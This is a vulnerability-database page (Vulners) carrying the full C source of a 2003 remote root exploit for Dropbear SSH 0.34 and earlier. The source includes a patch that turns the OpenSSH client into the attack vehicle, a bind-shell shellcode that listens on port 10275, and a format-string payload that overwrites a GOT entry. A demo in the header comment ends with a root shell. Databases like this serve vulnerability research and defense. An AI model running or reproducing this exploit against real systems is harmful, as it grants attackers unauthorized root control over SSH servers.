Vulners
Lucene search
Dropbear SSH <= 0.34 Remote Root Exploit
/*
* Linux x86 Dropbear SSH <= 0.34 remote root exploit
* coded by live
*
* You'll need a hacked ssh client to try this out. I included a patch
* to openssh-3.6.p1 somewhere below this comment.
*
* The point is: the buffer being exploited is too small(25 bytes) to hold our
* shellcode, so a workaround was needed in order to send it. What I did here
* was to hack the ssh client so that it sends the local environment variable
* SHELLCODE as ssh's methodname string. This method was described by Joel
* Eriksson @ 0xbadc0ded.org.
*
* The 25 bytes limitation is also the reason for the the strange ``2 byte''
* retaddr you will see here. That's not enough for complete pointer overwrite,
* so I decided to overwrite 3rd and 2nd bytes and hope our shellcode is
* around ;)
*
* % telnet localhost 22
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* SSH-2.0-dropbear_0.34
* ^]
* telnet> quit
* Connection closed.
*
* % objdump -R /usr/local/sbin/dropbear| grep malloc
* 080673bc R_386_JUMP_SLOT malloc
*
* % drop-root -v24 localhost
* ?.2022u%24$hn@localhost's password:
* Connection closed by 127.0.0.1
*
* % telnet localhost 10275
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* id; exit;
* uid=0(root) gid=0(root) groups=0(root)
* Connection closed by foreign host.
*
* In the above example we were able to lookup a suitable .got entry(used as
* retloc here), but this may not be true under a hostile environment. If
* exploiting this remotely I feel like chances would be greater if we attack
* the stack, but that's just a guess.
*
* Version pad is 24 to 0.34, 12 to 0.32. I don't know about other versions.
*
* gr33tz: ppro, alcaloide and friends.
*
* 21.08.2003
* Please do not distribute
*/
/*
--- sshconnect2.c2003-08-21 21:34:03.000000000 -0300
+++ sshconnect2.c.hack2003-08-21 21:33:47.000000000 -0300
@@ -278,6 +278,8 @@
void
userauth(Authctxt *authctxt, char *authlist)
{
+ char *shellcode = getenv("SHELLCODE");
+
if (authlist == NULL) {
authlist = authctxt->authlist;
} else {
@@ -290,6 +292,7 @@
if (method == NULL)
fatal("Permission denied (%s).", authlist);
authctxt->method = method;
+ authctxt->method->name = shellcode;
if (method->userauth(authctxt) != 0) {
debug2("we sent a %s packet, wait for reply", method->name);
break;
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define SSH_PATH "ssh"
#define SSH_PORT "22"
#define DEFAULT_VERSION_PAD 24
#define DEFAULT_RETLOC 0xbffff800
#define DEFAULT_RETADDR 0x080e /* 2 byte retaddr, not enough space for a
* full overwrite. */
/* fork/bind shellcode by live
* default port is 10275
*
* I believe this can be futher optmized, but size is not
* an issue here since we are sending the shellcode through
* a ssh variable which is about 30k bytes long.
*/
char shellcode[] =
"x31xc0" /* xor %eax,%eax */
"xb0x02" /* mov $0x2,%al */
"xcdx80" /* int $0x80 */
"x85xc0" /* test %eax,%eax */
"x75x54" /* jne 5e */
"xebx50" /* jmp 5c */
"x5e" /* pop %esi */
"x31xc0" /* xor %eax,%eax */
"x31xdb" /* xor %ebx,%ebx */
"x89x46x08" /* mov %eax,0x8(%esi) */
"xb0x02" /* mov $0x2,%al */
"x89x06" /* mov %eax,(%esi) */
"xfexc8" /* dec %al */
"x89x46x04" /* mov %eax,0x4(%esi) */
"xb0x66" /* mov $0x66,%al */
"xfexc3" /* inc %bl */
"x89xf1" /* mov %esi,%ecx */
"xcdx80" /* int $0x80 */
"x89x06" /* mov %eax,(%esi) */
"x89x4ex04" /* mov %ecx,0x4(%esi) */
"x80x46x04x0c" /* addb $0xc,0x4(%esi) */
"x31xc0" /* xor %eax,%eax */
"xb0x10" /* mov $0x10,%al */
"x89x46x08" /* mov %eax,0x8(%esi) */
"xb0x02" /* mov $0x2,%al */
"x66x89x46x0c" /* mov %ax,0xc(%esi) */
"x66xb8x28x23" /* mov $0x2328,%ax */
"x89x46x0e" /* mov %eax,0xe(%esi) */
"x31xc0" /* xor %eax,%eax */
"x89x46x10" /* mov %eax,0x10(%esi) */
"xb0x66" /* mov $0x66,%al */
"xfexc3" /* inc %bl */
"xcdx80" /* int $0x80 */
"xfexcb" /* dec %bl */
"x89x5ex04" /* mov %ebx,0x4(%esi) */
"x31xc0" /* xor %eax,%eax */
"xb0x66" /* mov $0x66,%al */
"xb3x04" /* mov $0x4,%bl */
"xcdx80" /* int $0x80 */
"xebx04" /* jmp 60 */
"xebx44" /* jmp a2 */
"xebx3a" /* jmp 9a */
"x31xc0" /* xor %eax,%eax */
"x89x46x04" /* mov %eax,0x4(%esi) */
"x89x46x08" /* mov %eax,0x8(%esi) */
"xb0x66" /* mov $0x66,%al */
"xfexc3" /* inc %bl */
"xcdx80" /* int $0x80 */
"x31xc9" /* xor %ecx,%ecx */
"x89xc3" /* mov %eax,%ebx */
"x31xc0" /* xor %eax,%eax */
"xb0x3f" /* mov $0x3f,%al */
"xcdx80" /* int $0x80 */
"xfexc1" /* inc %cl */
"x80xf9x03" /* cmp $0x3,%cl */
"x75xf3" /* jne 72 */
"x68x2fx2fx73x68" /* push $0x68732f2f */
"x68x2fx62x69x6e" /* push $0x6e69622f */
"x89xe3" /* mov %esp,%ebx */
"x31xc0" /* xor %eax,%eax */
"x88x43x08" /* mov %al,0x8(%ebx) */
"x50" /* push %eax */
"x53" /* push %ebx */
"x89xe1" /* mov %esp,%ecx */
"x89xe2" /* mov %esp,%edx */
"xb0x0b" /* mov $0xb,%al */
"xcdx80" /* int $0x80 */
"x31xc0" /* xor %eax,%eax */
"x31xdb" /* xor %ebx,%ebx */
"xfexc0" /* inc %al */
"xcdx80" /* int $0x80 */
"xe8x65xffxffxff" /* call c <up> */
;
static void usage(const char *progname);
int
main(int argc, char *argv[])
{
char buffer[29500], fmt[26], *target;
long int retloc, retaddr;
int ch, version_pad;
retloc = DEFAULT_RETLOC +1;
retaddr = DEFAULT_RETADDR -40;
version_pad = DEFAULT_VERSION_PAD;
while ( (ch = getopt(argc, argv, "l:r:v:")) != -1) {
switch (ch) {
case 'l':
retloc += atoi(optarg) *4;
break;
case 'r':
retaddr += atoi(optarg) *4;
break;
case 'v':
version_pad = atoi(optarg);
break;
}
}
if (argc -optind != 1) {
usage(argv[0]);
exit(-1);
}
argc -= optind;
argv += optind;
target = argv[0];
memset(buffer, 0x90, 29500);
memcpy(buffer +29500 -strlen(shellcode), shellcode, strlen(shellcode));
memcpy(buffer, "SHELLCODE=", 10);
putenv(buffer);
snprintf(fmt, sizeof fmt, "%c%c%c%c%%.%du%%%d$hn",
(retloc & 0xff),
(retloc & 0xff00) >> 8,
(retloc & 0xff0000) >> 16,
(retloc & 0xff000000) >> 24,
retaddr,
version_pad);
execl(SSH_PATH, "ssh", "-l", fmt, "-p", SSH_PORT, target, NULL);
exit(0);
}
static void
usage(const char *progname) {
fprintf(stderr, "Linux x86 Dropbear SSH <= 0.34 remote root exploitn");
fprintf(stderr, "coded by livenn");
fprintf(stderr, "Usage: %s [-l <retloc offset>] [-r <retaddr offset>]"
" [-v <version pad>] <target>n", progname);
}
// milw0rm.com [2004-08-09]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1